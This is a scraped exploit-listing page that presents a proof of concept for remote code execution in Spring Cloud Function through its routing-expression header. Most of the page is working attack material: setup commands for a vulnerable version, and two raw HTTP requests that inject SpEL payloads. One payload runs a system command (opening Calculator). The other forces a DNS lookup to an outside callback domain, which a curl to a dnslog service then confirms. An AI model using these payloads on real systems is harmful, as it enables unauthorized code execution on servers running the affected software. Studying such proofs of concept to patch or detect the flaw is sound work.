Spring-Spel-0Day-Poc - Spring-Cloud / Spring-Cloud-Function, Spring.Cloud.Function.Routing-Expression, RCE, 0Day, 0-Day, POC, EXP
spring-cloud/spring-cloud-function RCE EXP POC https://github.com/spring-cloud/spring-cloud-function header
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app")build
wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zipunzip v3.1.6.zipcd spring-cloud-function-3.1.6cd spring-cloud-function-samples/function-sample-pojomvn packagejava -jar ./target/function-sample-pojo-2.0.0.RELEASE.jarget path lists for test
find . -name "*.java"|xargs -I % cat %|grep -Eo '"([^" \.\/=>\|,:\}\+\)'"'"']{8,})"'|sort -u|sed 's/"//g'...functionRouteruppercaselowercase...
poc1
POST /functionRouter HTTP/1.1host:127.0.0.1:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15Connection: closespring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a /System/Applications/Calculator.app")Content-Length: 551pwn
poc2
POST /functionRouter HTTP/1.1host:127.0.0.1:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15Connection: closespring.cloud.function.routing-expression:T(java.net.InetAddress).getByName("random87535.rce.51pwn.com")Content-Length: 551pwncheck
curl -v 'https://51pwn.com/dnslog?q=random87535.rce.51pwn.com'Source: www.kitploit.com
Spring-Spel-0Day-Poc - Spring-Cloud / Spring-Cloud-Function, Spring.Cloud.Function.Routing-Expression, RCE, 0Day, 0-Day, POC, EXP
Reviewed by Anonymous
on
1:33 PM
Rating:
Reviewed by Anonymous
on
1:33 PM
Rating:
